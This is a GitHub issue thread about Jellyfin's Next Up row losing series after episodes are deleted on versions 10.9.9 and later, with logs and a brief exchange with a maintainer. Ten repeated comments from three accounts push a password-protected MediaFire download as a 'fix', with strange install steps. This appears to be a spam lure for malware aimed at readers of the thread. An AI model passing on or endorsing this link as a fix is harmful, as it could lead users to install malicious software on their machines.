### ISSUE TITLE
Items disapearing from Next Up

### ISSUE THREAD

**Issue by BB-Forrest** [jellyfin/jellyfin#12525]
### This issue respects the following points:

- [X] This is a **bug**, not a question or a configuration issue; Please visit our forum or chat rooms first to troubleshoot with volunteers, before creating a report. The links can be found [here](https://jellyfin.org/contact/).
- [X] This issue is **not** already reported on [GitHub](https://github.com/jellyfin/jellyfin/issues?q=is%3Aopen+is%3Aissue) _(I've searched it)_.
- [X] I'm using an up to date version of Jellyfin Server stable, unstable or master; We generally do not support previous older versions. If possible, please update to the latest version before opening an issue.
- [X] I agree to follow Jellyfin's [Code of Conduct](https://jellyfin.org/docs/general/community-standards.html#code-of-conduct).
- [X] This report addresses only a single issue; If you encounter multiple issues, kindly create separate reports for each one.

### Description of the bug

Last worked fine on 10.9.8, on 10.9.9 and 10.9.10 following behaviour occurs.

Watching multiple series so next up has multiple entries, if you watch an episode and delete it then the next up occasinally loses the series that was the first entry on the on the left hand side.

### Reproduction steps

As above, watch episdoe of a series, delete it, next episode appears correctly on left hand side of next up section.

Watch episode of series to right, delete it and next episode appears correctly but the item that was to the left of it disapears.

### What is the current _bug_ behavior?

As above.

### What is the expected _correct_ behavior?

Items should still be displayed.

### Jellyfin Server version

10.9.9+

### Specify the build version

10.9.10

### Environment

```markdown
Windows 11 - Jellyfin server
Android TV Client (latest version)
```

### Jellyfin logs

```shell
Checking the logs shows no difference between the server versions, the SQL query isn't a logged operation but below is relevant part.

[2024-08-26 23:35:13.571 +01:00] [INF] [9] Emby.Server.Implementations.Library.LibraryManager: Removing item, Type: "Episode", Name: "X", Path: "Z:\FTP\TV\Y\X.mkv", Id: 44e325c3-b84c-8314-6d02-9d8be2528613
[2024-08-26 23:35:13.573 +01:00] [INF] [9] Emby.Server.Implementations.Library.LibraryManager: Deleting item path, Type: "Episode", Name: "X", Path: "Z:\FTP\TV\Y\X.mkv", Id: 44e325c3-b84c-8314-6d02-9d8be2528613
[2024-08-26 23:36:13.699 +01:00] [INF] [9] Emby.Server.Implementations.IO.LibraryMonitor: "Y" ("Z:\FTP\TV\Y") will be refreshed.
[2024-08-26 23:57:00.012 +01:00] [INF] [83] Emby.Server.Implementations.Session.SessionManager: Sending shutdown notifications


If you require anything else please let me know and I'll provide.
```

### FFmpeg logs

```shell
N/A
```

### Client / Browser logs

List appears same on Web browser client

### Relevant screenshots or videos

N/A

### Additional information

N/A

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BB-Forrest** [comment]
Forgot to say - downgrading again to 10.9.8 solves the issue.

**Comment by JkBoyo** [comment]
Just for clarification how are you deleting the episode? Are you going into your file system or using the ui of JF to perform this deletion?

**Comment by BB-Forrest** [comment]
Through the TV client, not on the server.

**Comment by JkBoyo** [comment]
and do you do it before you go back to the home screen?

**Comment by BB-Forrest** [comment]
Yes, upon watching the episode and from the screen that has watched tick on
it.

**Comment by BB-Forrest** [comment]
If it's possible to send me the SQL that it uses to populate that field I'm happy to run it against the DB and see if I can figure out where it's wrong.

**Comment by JkBoyo** [comment]
Yeah I am not sure myself on that I am just trying to make sure I know the exact steps you are using so I can attempt to replicate it.

**Comment by BB-Forrest** [comment]
To make matters worse it doesn't do it with every series!

If anyone reading this can provide the code used I'll have a play with it
in the DB.

I'm not a developer but I am a DBA.

**Comment by theguymadmax** [comment]
Closing in favor of  #15151
